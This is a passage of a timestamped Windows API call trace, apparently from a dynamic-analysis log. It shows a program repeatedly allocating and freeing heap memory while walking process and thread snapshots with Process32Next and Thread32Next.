GetTickCount () returned 0x11725ec [0092.617] GetCurrentThreadId () returned 0x8c4 [0092.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.617] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0092.618] GetTickCount () returned 0x11725ec [0092.618] GetCurrentThreadId () returned 0x8c4 [0092.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.618] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 0 [0092.619] GetTickCount () returned 0x11725ec [0092.619] Thread32First (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.620] GetCurrentThreadId () returned 0x8c4 [0092.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.620] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.621] GetTickCount () returned 0x11725fb [0092.621] GetCurrentThreadId () returned 0x8c4 [0092.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.621] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.622] GetTickCount () returned 0x11725fb [0092.622] GetCurrentThreadId () returned 0x8c4 [0092.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.623] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.623] GetTickCount () returned 0x11725fb [0092.624] GetCurrentThreadId () returned 0x8c4 [0092.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.624] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.625] GetTickCount () returned 0x11725fb [0092.625] GetCurrentThreadId () returned 0x8c4 [0092.625] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.625] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.626] GetTickCount () returned 0x11725fb [0092.626] GetCurrentThreadId () returned 0x8c4 [0092.626] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.626] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.626] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.627] GetTickCount () returned 0x11725fb [0092.627] GetCurrentThreadId () returned 0x8c4 [0092.627] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.627] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.628] GetTickCount () returned 0x11725fb [0092.628] GetCurrentThreadId () returned 0x8c4 [0092.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.629] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.629] GetTickCount () returned 0x11725fb [0092.629] GetCurrentThreadId () returned 0x8c4 [0092.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.630] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.631] GetTickCount () returned 0x11725fb [0092.631] GetCurrentThreadId () returned 0x8c4 [0092.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.631] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.632] GetTickCount () returned 0x11725fb [0092.632] GetCurrentThreadId () returned 0x8c4 [0092.632] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.632] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.633] GetTickCount () returned 0x11725fb [0092.633] GetCurrentThreadId () returned 0x8c4 [0092.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.633] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.634] GetTickCount () returned 0x11725fb [0092.634] GetCurrentThreadId () returned 0x8c4 [0092.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.635] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.636] GetTickCount () returned 0x11725fb [0092.636] GetCurrentThreadId () returned 0x8c4 [0092.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.636] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.637] GetTickCount () returned 0x11725fb [0092.637] GetCurrentThreadId () returned 0x8c4 [0092.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.637] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.638] GetTickCount () returned 0x117260b [0092.639] GetCurrentThreadId () returned 0x8c4 [0092.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.639] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.640] GetTickCount () returned 0x117260b [0092.640] GetCurrentThreadId () returned 0x8c4 [0092.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.640] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.641] GetTickCount () returned 0x117260b [0092.641] GetCurrentThreadId () returned 0x8c4 [0092.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.641] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.642] GetTickCount () returned 0x117260b [0092.642] GetCurrentThreadId () returned 0x8c4 [0092.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.642] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.643] GetTickCount () returned 0x117260b [0092.643] GetCurrentThreadId () returned 0x8c4 [0092.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.644] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.645] GetTickCount () returned 0x117260b [0092.645] GetCurrentThreadId () returned 0x8c4 [0092.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.645] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.646] GetTickCount () returned 0x117260b [0092.646] GetCurrentThreadId () returned 0x8c4 [0092.646] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.646] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.647] GetTickCount () returned 0x117260b [0092.647] GetCurrentThreadId () returned 0x8c4 [0092.647] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.647] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.648] GetTickCount () returned 0x117260b [0092.648] GetCurrentThreadId () returned 0x8c4 [0092.648] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.648] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.648] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.649] GetTickCount () returned 0x117260b [0092.649] GetCurrentThreadId () returned 0x8c4 [0092.649] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.649] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.649] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.650] GetTickCount () returned 0x117260b [0092.650] GetCurrentThreadId () returned 0x8c4 [0092.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.651] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.652] GetTickCount () returned 0x117260b [0092.652] GetCurrentThreadId () returned 0x8c4 [0092.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.652] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.670] GetTickCount () returned 0x117262a [0092.670] GetCurrentThreadId () returned 0x8c4 [0092.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.670] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.671] GetTickCount () returned 0x117262a [0092.671] GetCurrentThreadId () returned 0x8c4 [0092.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.671] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.672] GetTickCount () returned 0x117262a [0092.672] GetCurrentThreadId () returned 0x8c4 [0092.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.672] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.673] GetTickCount () returned 0x117262a [0092.673] GetCurrentThreadId () returned 0x8c4 [0092.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.673] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.674] GetTickCount () returned 0x117262a [0092.674] GetCurrentThreadId () returned 0x8c4 [0092.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.675] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.675] GetTickCount () returned 0x117262a [0092.675] GetCurrentThreadId () returned 0x8c4 [0092.676] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.676] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.677] GetTickCount () returned 0x117262a [0092.677] GetCurrentThreadId () returned 0x8c4 [0092.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.677] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.678] GetTickCount () returned 0x117262a [0092.678] GetCurrentThreadId () returned 0x8c4 [0092.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.678] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.679] GetTickCount () returned 0x117262a [0092.679] GetCurrentThreadId () returned 0x8c4 [0092.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.679] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.680] GetTickCount () returned 0x117262a [0092.680] GetCurrentThreadId () returned 0x8c4 [0092.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.680] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.681] GetTickCount () returned 0x117262a [0092.681] GetCurrentThreadId () returned 0x8c4 [0092.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.681] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.682] GetTickCount () returned 0x117262a [0092.682] GetCurrentThreadId () returned 0x8c4 [0092.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.683] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.683] GetTickCount () returned 0x117262a [0092.684] GetCurrentThreadId () returned 0x8c4 [0092.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.684] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.685] GetTickCount () returned 0x117263a [0092.685] GetCurrentThreadId () returned 0x8c4 [0092.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.685] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.686] GetTickCount () returned 0x117263a [0092.686] GetCurrentThreadId () returned 0x8c4 [0092.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.686] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.688] GetTickCount () returned 0x117263a [0092.688] GetCurrentThreadId () returned 0x8c4 [0092.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.688] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.689] GetTickCount () returned 0x117263a [0092.689] GetCurrentThreadId () returned 0x8c4 [0092.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.690] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.691] GetTickCount () returned 0x117263a [0092.691] GetCurrentThreadId () returned 0x8c4 [0092.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.691] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.692] GetTickCount () returned 0x117263a [0092.692] GetCurrentThreadId () returned 0x8c4 [0092.692] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.692] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.693] GetTickCount () returned 0x117263a [0092.693] GetCurrentThreadId () returned 0x8c4 [0092.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.694] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.695] GetTickCount () returned 0x117263a [0092.695] GetCurrentThreadId () returned 0x8c4 [0092.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.695] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.696] GetTickCount () returned 0x117263a [0092.696] GetCurrentThreadId () returned 0x8c4 [0092.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.696] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.697] GetTickCount () returned 0x117263a [0092.697] GetCurrentThreadId () returned 0x8c4 [0092.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.697] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.698] GetTickCount () returned 0x117263a [0092.698] GetCurrentThreadId () returned 0x8c4 [0092.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.699] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.700] GetTickCount () returned 0x1172649 [0092.700] GetCurrentThreadId () returned 0x8c4 [0092.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.700] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.701] GetTickCount () returned 0x1172649 [0092.701] GetCurrentThreadId () returned 0x8c4 [0092.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.701] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.702] GetTickCount () returned 0x1172649 [0092.702] GetCurrentThreadId () returned 0x8c4 [0092.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.703] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.704] GetTickCount () returned 0x1172649 [0092.704] GetCurrentThreadId () returned 0x8c4 [0092.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.704] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.705] GetTickCount () returned 0x1172649 [0092.705] GetCurrentThreadId () returned 0x8c4 [0092.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.705] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.706] GetTickCount () returned 0x1172649 [0092.706] GetCurrentThreadId () returned 0x8c4 [0092.706] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.707] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.707] GetTickCount () returned 0x1172649 [0092.707] GetCurrentThreadId () returned 0x8c4 [0092.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.708] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.709] GetTickCount () returned 0x1172649 [0092.709] GetCurrentThreadId () returned 0x8c4 [0092.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.709] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.710] GetTickCount () returned 0x1172649 [0092.710] GetCurrentThreadId () returned 0x8c4 [0092.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.710] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.711] GetTickCount () returned 0x1172649 [0092.711] GetCurrentThreadId () returned 0x8c4 [0092.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.712] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.713] GetTickCount () returned 0x1172649 [0092.713] GetCurrentThreadId () returned 0x8c4 [0092.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.713] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.714] GetTickCount () returned 0x1172649 [0092.714] GetCurrentThreadId () returned 0x8c4 [0092.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.714] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.715] GetTickCount () returned 0x1172659 [0092.715] GetCurrentThreadId () returned 0x8c4 [0092.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.715] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.716] GetTickCount () returned 0x1172659 [0092.716] GetCurrentThreadId () returned 0x8c4 [0092.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.716] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.717] GetTickCount () returned 0x1172659 [0092.717] GetCurrentThreadId () returned 0x8c4 [0092.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.717] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.718] GetTickCount () returned 0x1172659 [0092.718] GetCurrentThreadId () returned 0x8c4 [0092.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.719] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.720] GetTickCount () returned 0x1172659 [0092.720] GetCurrentThreadId () returned 0x8c4 [0092.720] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.720] Thread32Next (hSnapshot=0x6f4, lpte=0x9ccf434) returned 1 [0092.721] GetTickCount () returned 0x1172659 [0092.721] GetCurrentThreadId () returned 0x8c4 [0092.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 